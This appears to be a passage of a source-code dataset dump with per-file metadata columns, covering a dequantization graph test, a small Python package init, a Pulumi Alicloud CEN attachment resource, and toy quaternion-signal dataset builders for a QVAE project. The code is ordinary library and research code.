        DequantizeLinearResolver().find_and_replace_pattern(graph)
        (flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
        self.assertTrue(flag, resp)
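The reference graphs these tests compare against implement the standard DequantizeLinear arithmetic, `(x - zero_point) * scale`, as a Convert -> Subtract -> Multiply chain. A quick numeric sanity check using the same constants as the tests above:

```python
import numpy as np

x = np.array([0, 128, 255], dtype=np.uint8)
scale = np.float32(1.0 / 255)
zero_point = np.uint8(0)

# Convert -> Subtract -> Multiply, exactly the decomposed graph:
dequantized = (x.astype(np.float32) - np.float32(zero_point)) * scale
print(dequantized)  # [0.        0.5019608 1.       ]
```

The axis-aware tests additionally reshape the per-channel scale and zero point to a broadcastable `target_shape` (for example `[1, 3, 1, 1]` for axis 1), which is what the extra Reshape nodes in the reference graph encode.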
| 57.243697
| 112
| 0.438784
| 1,333
| 13,624
| 4.177044
| 0.07952
| 0.072917
| 0.073276
| 0.057471
| 0.848599
| 0.831717
| 0.796516
| 0.766164
| 0.748922
| 0.748922
| 0
| 0.038466
| 0.39702
| 13,624
| 237
| 113
| 57.485232
| 0.639318
| 0.005652
| 0
| 0.72381
| 0
| 0
| 0.236267
| 0.012995
| 0
| 0
| 0
| 0
| 0.014286
| 1
| 0.014286
| false
| 0
| 0.033333
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
825729d7ada1eddd7737c57df63bdb56b3e0725b
| 105
|
py
|
Python
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 22
|
2020-05-20T08:34:44.000Z
|
2022-01-30T23:53:11.000Z
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 5
|
2020-07-06T20:28:54.000Z
|
2021-12-31T21:55:13.000Z
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 7
|
2020-09-15T03:17:57.000Z
|
2022-02-11T08:21:04.000Z
|
from tinder_api import api_endpoints
from tinder_api.api import Tinder_API
from tinder_api import helpers
| 35
| 37
| 0.885714
| 18
| 105
| 4.888889
| 0.333333
| 0.409091
| 0.443182
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104762
| 105
| 3
| 38
| 35
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
826028a73b1b2292efa32dd3dae414fbde49bf78
| 892
|
py
|
Python
|
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 12
|
2019-08-20T06:27:15.000Z
|
2022-02-15T05:26:58.000Z
|
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 7
|
2019-08-26T03:31:26.000Z
|
2022-03-19T06:17:39.000Z
|
# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    __init__.py                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: winshare <tanwenxuan@live.com>             +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2020/02/28 11:45:13 by winshare          #+#    #+#              #
#    Updated: 2020/02/28 11:50:11 by winshare         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #
| 68.615385
| 80
| 0.113229
| 26
| 892
| 3.730769
| 0.653846
| 0.309278
| 0.164948
| 0.206186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077562
| 0.595291
| 892
| 12
| 81
| 74.333333
| 0.191136
| 0.933857
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82c9366d285e3bc855ac5f3f42562da471c00cd8
| 20,585
|
py
|
Python
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['InstanceAttachmentArgs', 'InstanceAttachment']
@pulumi.input_type
class InstanceAttachmentArgs:
    def __init__(__self__, *,
                 child_instance_id: pulumi.Input[str],
                 child_instance_region_id: pulumi.Input[str],
                 child_instance_type: pulumi.Input[str],
                 instance_id: pulumi.Input[str],
                 cen_owner_id: Optional[pulumi.Input[int]] = None,
                 child_instance_owner_id: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing an InstanceAttachment resource.
        :param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
        :param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
        :param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        :param pulumi.Input[str] instance_id: The ID of the CEN.
        :param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
        :param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attaching a child instance of another account.
        """
        pulumi.set(__self__, "child_instance_id", child_instance_id)
        pulumi.set(__self__, "child_instance_region_id", child_instance_region_id)
        pulumi.set(__self__, "child_instance_type", child_instance_type)
        pulumi.set(__self__, "instance_id", instance_id)
        if cen_owner_id is not None:
            pulumi.set(__self__, "cen_owner_id", cen_owner_id)
        if child_instance_owner_id is not None:
            pulumi.set(__self__, "child_instance_owner_id", child_instance_owner_id)

    @property
    @pulumi.getter(name="childInstanceId")
    def child_instance_id(self) -> pulumi.Input[str]:
        """
        The ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_id")

    @child_instance_id.setter
    def child_instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "child_instance_id", value)

    @property
    @pulumi.getter(name="childInstanceRegionId")
    def child_instance_region_id(self) -> pulumi.Input[str]:
        """
        The region ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_region_id")

    @child_instance_region_id.setter
    def child_instance_region_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "child_instance_region_id", value)

    @property
    @pulumi.getter(name="childInstanceType")
    def child_instance_type(self) -> pulumi.Input[str]:
        """
        The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        """
        return pulumi.get(self, "child_instance_type")

    @child_instance_type.setter
    def child_instance_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "child_instance_type", value)

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Input[str]:
        """
        The ID of the CEN.
        """
        return pulumi.get(self, "instance_id")

    @instance_id.setter
    def instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_id", value)

    @property
    @pulumi.getter(name="cenOwnerId")
    def cen_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The account ID to which the CEN instance belongs.
        """
        return pulumi.get(self, "cen_owner_id")

    @cen_owner_id.setter
    def cen_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cen_owner_id", value)

    @property
    @pulumi.getter(name="childInstanceOwnerId")
    def child_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The uid of the child instance. Only used when attaching a child instance of another account.
        """
        return pulumi.get(self, "child_instance_owner_id")

    @child_instance_owner_id.setter
    def child_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "child_instance_owner_id", value)


@pulumi.input_type
class _InstanceAttachmentState:
    def __init__(__self__, *,
                 cen_owner_id: Optional[pulumi.Input[int]] = None,
                 child_instance_id: Optional[pulumi.Input[str]] = None,
                 child_instance_owner_id: Optional[pulumi.Input[int]] = None,
                 child_instance_region_id: Optional[pulumi.Input[str]] = None,
                 child_instance_type: Optional[pulumi.Input[str]] = None,
                 instance_id: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering InstanceAttachment resources.
        :param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
        :param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
        :param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attaching a child instance of another account.
        :param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
        :param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        :param pulumi.Input[str] instance_id: The ID of the CEN.
        :param pulumi.Input[str] status: The associating status of the network.
        """
        if cen_owner_id is not None:
            pulumi.set(__self__, "cen_owner_id", cen_owner_id)
        if child_instance_id is not None:
            pulumi.set(__self__, "child_instance_id", child_instance_id)
        if child_instance_owner_id is not None:
            pulumi.set(__self__, "child_instance_owner_id", child_instance_owner_id)
        if child_instance_region_id is not None:
            pulumi.set(__self__, "child_instance_region_id", child_instance_region_id)
        if child_instance_type is not None:
            pulumi.set(__self__, "child_instance_type", child_instance_type)
        if instance_id is not None:
            pulumi.set(__self__, "instance_id", instance_id)
        if status is not None:
            pulumi.set(__self__, "status", status)

    @property
    @pulumi.getter(name="cenOwnerId")
    def cen_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The account ID to which the CEN instance belongs.
        """
        return pulumi.get(self, "cen_owner_id")

    @cen_owner_id.setter
    def cen_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cen_owner_id", value)

    @property
    @pulumi.getter(name="childInstanceId")
    def child_instance_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_id")

    @child_instance_id.setter
    def child_instance_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "child_instance_id", value)

    @property
    @pulumi.getter(name="childInstanceOwnerId")
    def child_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The uid of the child instance. Only used when attaching a child instance of another account.
        """
        return pulumi.get(self, "child_instance_owner_id")

    @child_instance_owner_id.setter
    def child_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "child_instance_owner_id", value)

    @property
    @pulumi.getter(name="childInstanceRegionId")
    def child_instance_region_id(self) -> Optional[pulumi.Input[str]]:
        """
        The region ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_region_id")

    @child_instance_region_id.setter
    def child_instance_region_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "child_instance_region_id", value)

    @property
    @pulumi.getter(name="childInstanceType")
    def child_instance_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        """
        return pulumi.get(self, "child_instance_type")

    @child_instance_type.setter
    def child_instance_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "child_instance_type", value)

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the CEN.
        """
        return pulumi.get(self, "instance_id")

    @instance_id.setter
    def instance_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_id", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The associating status of the network.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)


class InstanceAttachment(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cen_owner_id: Optional[pulumi.Input[int]] = None,
                 child_instance_id: Optional[pulumi.Input[str]] = None,
                 child_instance_owner_id: Optional[pulumi.Input[int]] = None,
                 child_instance_region_id: Optional[pulumi.Input[str]] = None,
                 child_instance_type: Optional[pulumi.Input[str]] = None,
                 instance_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a CEN child instance attachment resource that associates the network (VPC, CCN, VBR) with the CEN instance.

        ->**NOTE:** Available in 1.42.0+

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        config = pulumi.Config()
        name = config.get("name")
        if name is None:
            name = "tf-testAccCenInstanceAttachmentBasic"
        cen = alicloud.cen.Instance("cen", description="terraform01")
        vpc = alicloud.vpc.Network("vpc", cidr_block="192.168.0.0/16")
        foo = alicloud.cen.InstanceAttachment("foo",
            instance_id=cen.id,
            child_instance_id=vpc.id,
            child_instance_type="VPC",
            child_instance_region_id="cn-beijing")
        ```

        ## Import

        CEN instance can be imported using the id, e.g.

        ```sh
        $ pulumi import alicloud:cen/instanceAttachment:InstanceAttachment example cen-m7i7pjmkon********:vpc-2ze2w07mcy9nz********:VPC:cn-beijing
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
        :param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
        :param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attaching a child instance of another account.
        :param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
        :param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        :param pulumi.Input[str] instance_id: The ID of the CEN.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: InstanceAttachmentArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a CEN child instance attachment resource that associates the network (VPC, CCN, VBR) with the CEN instance.

        ->**NOTE:** Available in 1.42.0+

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        config = pulumi.Config()
        name = config.get("name")
        if name is None:
            name = "tf-testAccCenInstanceAttachmentBasic"
        cen = alicloud.cen.Instance("cen", description="terraform01")
        vpc = alicloud.vpc.Network("vpc", cidr_block="192.168.0.0/16")
        foo = alicloud.cen.InstanceAttachment("foo",
            instance_id=cen.id,
            child_instance_id=vpc.id,
            child_instance_type="VPC",
            child_instance_region_id="cn-beijing")
        ```

        ## Import

        CEN instance can be imported using the id, e.g.

        ```sh
        $ pulumi import alicloud:cen/instanceAttachment:InstanceAttachment example cen-m7i7pjmkon********:vpc-2ze2w07mcy9nz********:VPC:cn-beijing
        ```

        :param str resource_name: The name of the resource.
        :param InstanceAttachmentArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(InstanceAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       cen_owner_id: Optional[pulumi.Input[int]] = None,
                       child_instance_id: Optional[pulumi.Input[str]] = None,
                       child_instance_owner_id: Optional[pulumi.Input[int]] = None,
                       child_instance_region_id: Optional[pulumi.Input[str]] = None,
                       child_instance_type: Optional[pulumi.Input[str]] = None,
                       instance_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = InstanceAttachmentArgs.__new__(InstanceAttachmentArgs)

            __props__.__dict__["cen_owner_id"] = cen_owner_id
            if child_instance_id is None and not opts.urn:
                raise TypeError("Missing required property 'child_instance_id'")
            __props__.__dict__["child_instance_id"] = child_instance_id
            __props__.__dict__["child_instance_owner_id"] = child_instance_owner_id
            if child_instance_region_id is None and not opts.urn:
                raise TypeError("Missing required property 'child_instance_region_id'")
            __props__.__dict__["child_instance_region_id"] = child_instance_region_id
            if child_instance_type is None and not opts.urn:
                raise TypeError("Missing required property 'child_instance_type'")
            __props__.__dict__["child_instance_type"] = child_instance_type
            if instance_id is None and not opts.urn:
                raise TypeError("Missing required property 'instance_id'")
            __props__.__dict__["instance_id"] = instance_id
            __props__.__dict__["status"] = None
        super(InstanceAttachment, __self__).__init__(
            'alicloud:cen/instanceAttachment:InstanceAttachment',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            cen_owner_id: Optional[pulumi.Input[int]] = None,
            child_instance_id: Optional[pulumi.Input[str]] = None,
            child_instance_owner_id: Optional[pulumi.Input[int]] = None,
            child_instance_region_id: Optional[pulumi.Input[str]] = None,
            child_instance_type: Optional[pulumi.Input[str]] = None,
            instance_id: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None) -> 'InstanceAttachment':
        """
        Get an existing InstanceAttachment resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
        :param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
        :param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attaching a child instance of another account.
        :param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
        :param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        :param pulumi.Input[str] instance_id: The ID of the CEN.
        :param pulumi.Input[str] status: The associating status of the network.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _InstanceAttachmentState.__new__(_InstanceAttachmentState)

        __props__.__dict__["cen_owner_id"] = cen_owner_id
        __props__.__dict__["child_instance_id"] = child_instance_id
        __props__.__dict__["child_instance_owner_id"] = child_instance_owner_id
        __props__.__dict__["child_instance_region_id"] = child_instance_region_id
        __props__.__dict__["child_instance_type"] = child_instance_type
        __props__.__dict__["instance_id"] = instance_id
        __props__.__dict__["status"] = status
        return InstanceAttachment(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="cenOwnerId")
    def cen_owner_id(self) -> pulumi.Output[Optional[int]]:
        """
        The account ID to which the CEN instance belongs.
        """
        return pulumi.get(self, "cen_owner_id")

    @property
    @pulumi.getter(name="childInstanceId")
    def child_instance_id(self) -> pulumi.Output[str]:
        """
        The ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_id")

    @property
    @pulumi.getter(name="childInstanceOwnerId")
    def child_instance_owner_id(self) -> pulumi.Output[int]:
        """
        The uid of the child instance. Only used when attaching a child instance of another account.
        """
        return pulumi.get(self, "child_instance_owner_id")

    @property
    @pulumi.getter(name="childInstanceRegionId")
    def child_instance_region_id(self) -> pulumi.Output[str]:
        """
        The region ID of the child instance to attach.
        """
        return pulumi.get(self, "child_instance_region_id")

    @property
    @pulumi.getter(name="childInstanceType")
    def child_instance_type(self) -> pulumi.Output[str]:
        """
        The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
        """
        return pulumi.get(self, "child_instance_type")

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Output[str]:
        """
        The ID of the CEN.
        """
        return pulumi.get(self, "instance_id")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        The associating status of the network.
        """
        return pulumi.get(self, "status")
| 43.155136
| 147
| 0.655332
| 2,533
| 20,585
| 5.033557
| 0.072246
| 0.166196
| 0.065882
| 0.056
| 0.860078
| 0.841333
| 0.830824
| 0.821255
| 0.803451
| 0.780706
| 0
| 0.003022
| 0.244547
| 20,585
| 476
| 148
| 43.245798
| 0.816861
| 0.304348
| 0
| 0.646825
| 1
| 0
| 0.131139
| 0.046208
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15873
| false
| 0.003968
| 0.019841
| 0
| 0.27381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d6432490965bf4ddf7906c4dc54c18f4d5aec2a
| 5,667
|
py
|
Python
|
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | 10
|
2021-03-25T11:56:37.000Z
|
2021-12-25T19:40:29.000Z
|
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | null | null | null |
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | 1
|
2021-12-28T10:39:57.000Z
|
2021-12-28T10:39:57.000Z
|
import torch
import random
import numpy as np
from scipy.signal import lfilter
### Build dataset for toy example #1
def QProper_signals1(len_train, len_val, len_test, n):
    # Generate Q-Proper signal for train
    train_dataset = torch.zeros((len_train, n * 4))
    for i in range(len_train):
        q0 = torch.randn(n) + 0.03
        q1 = torch.randn(n) + 0.03
        q2 = torch.randn(n) + 0.03
        q3 = torch.randn(n) + 0.03
        q = torch.cat([q0, q1, q2, q3], dim=0)
        train_dataset[i, :] = q
    # Assign the normalization result (the original bare expression was a no-op).
    train_dataset = train_dataset / torch.max(train_dataset)
    # Build validation set
    val_dataset = torch.zeros((len_val, n * 4))
    for i in range(len_val):
        q0 = torch.randn(n) + 0.03
        q1 = torch.randn(n) + 0.03
        q2 = torch.randn(n) + 0.03
        q3 = torch.randn(n) + 0.03
        q = torch.cat([q0, q1, q2, q3], dim=0)
        val_dataset[i, :] = q
    val_dataset = val_dataset / torch.max(val_dataset)
    # Build test set
    test_dataset = torch.zeros((len_test, n * 4))
    for i in range(len_test):
        q0 = torch.randn(n) + 0.03
        q1 = torch.randn(n) + 0.03
        q2 = torch.randn(n) + 0.03
        q3 = torch.randn(n) + 0.03
        q = torch.cat([q0, q1, q2, q3], dim=0)
        test_dataset[i, :] = q
    test_dataset = test_dataset / torch.max(test_dataset)
    train_loader = torch.utils.data.DataLoader(
        train_dataset, batch_size=len(train_dataset)
    )
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
    test_loader = torch.utils.data.DataLoader(
        test_dataset, batch_size=len(test_dataset)
    )
    return train_loader, val_loader, test_loader


### Build dataset for toy example #2
def QProper_signals2(len_train, len_val, len_test, n):
    # Generate Q-Proper signal for train
    b = 0.5
    train_dataset = torch.FloatTensor(
        lfilter([np.sqrt(1 - b ** 2)], [1 - b], (1 / (np.sqrt(4))) * (np.random.randn(len_train, 4)))
    )
    # Build validation set
    val_dataset = torch.FloatTensor(
        lfilter([np.sqrt(1 - b ** 2)], [1 - b], (1 / (np.sqrt(4))) * (np.random.randn(len_val, 4)))
    )
    # Build test set
    test_dataset = torch.FloatTensor(
        lfilter([np.sqrt(1 - b ** 2)], [1 - b], (1 / (np.sqrt(4))) * (np.random.randn(len_test, 4)))
    )
    train_loader = torch.utils.data.DataLoader(
        train_dataset, batch_size=len(train_dataset)
    )
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
    test_loader = torch.utils.data.DataLoader(
        test_dataset, batch_size=len(test_dataset)
    )
    return train_loader, val_loader, test_loader


def QImproper_signals1(len_train, len_val, len_test, n):
    w = torch.randn(len_train, 1) + 0.03
    q0 = torch.FloatTensor([0]).view(1, 1)
    q1 = torch.randn(1).view(1, 1)
    q2 = torch.randn(1).view(1, 1)
    q3 = torch.randn(1).view(1, 1)
    c = torch.cat([q0, q1, q2, q3], dim=1)
    a = torch.exp(c)
    q = a * w
    # q /= torch.max(q)
    train_dataset = q
    w = torch.randn(len_val, 1) + 0.03
    q0 = torch.FloatTensor([0]).view(1, 1)
    q1 = torch.randn(1).view(1, 1)
    q2 = torch.randn(1).view(1, 1)
    q3 = torch.randn(1).view(1, 1)
    c = torch.cat([q0, q1, q2, q3], dim=1)
    a = torch.exp(c)
    q = a * w
    # q /= torch.max(q)
    val_dataset = q
    w = torch.randn(len_test, 1) + 0.03
    q0 = torch.FloatTensor([0]).view(1, 1)
    q1 = torch.randn(1).view(1, 1)
    q2 = torch.randn(1).view(1, 1)
    q3 = torch.randn(1).view(1, 1)
    c = torch.cat([q0, q1, q2, q3], dim=1)
    a = torch.exp(c)
    q = a * w
    # q /= torch.max(q)
    test_dataset = q
    train_loader = torch.utils.data.DataLoader(
        train_dataset, batch_size=len(train_dataset)
    )
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
    test_loader = torch.utils.data.DataLoader(
        test_dataset, batch_size=len(test_dataset)
    )
    return train_loader, val_loader, test_loader


def QImproper_signals2(len_train, len_val, len_test, n):
    w = np.random.randn(len_train, 1) + 0.03
    w = w / np.max(w)
    b = [0.75, 0.78, 0.82, 0.85]
    q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
    q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
    q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
    q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
    train_dataset = torch.cat([q0, q1, q2, q3], dim=1)
    w = np.random.randn(len_val, 1) + 0.03
    w = w / np.max(w)
    q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
    q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
    q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
    q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
    val_dataset = torch.cat([q0, q1, q2, q3], dim=1)
    w = np.random.randn(len_test, 1) + 0.03
    w = w / np.max(w)
    q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
    q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
    q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
    q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
    test_dataset = torch.cat([q0, q1, q2, q3], dim=1)
    train_loader = torch.utils.data.DataLoader(
        train_dataset, batch_size=len(train_dataset)
    )
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
    test_loader = torch.utils.data.DataLoader(
        test_dataset, batch_size=len(test_dataset)
    )
    return train_loader, val_loader, test_loader
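All four builders return full-dataset loaders (batch_size equals the dataset length), so a single `next(iter(...))` yields the whole split. A quick usage sketch with made-up sizes:

```python
train_loader, val_loader, test_loader = QProper_signals1(
    len_train=1000, len_val=200, len_test=200, n=16)

batch = next(iter(train_loader))
# Each sample stacks n values for each of the 4 quaternion components.
print(batch.shape)  # torch.Size([1000, 64])
```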
| 34.981481
| 91
| 0.596083
| 939
| 5,667
| 3.478168
| 0.072417
| 0.018371
| 0.105634
| 0.114819
| 0.901715
| 0.895591
| 0.839865
| 0.825168
| 0.775566
| 0.767299
| 0
| 0.063586
| 0.228516
| 5,667
| 162
| 92
| 34.981481
| 0.68344
| 0.045703
| 0
| 0.595238
| 1
| 0
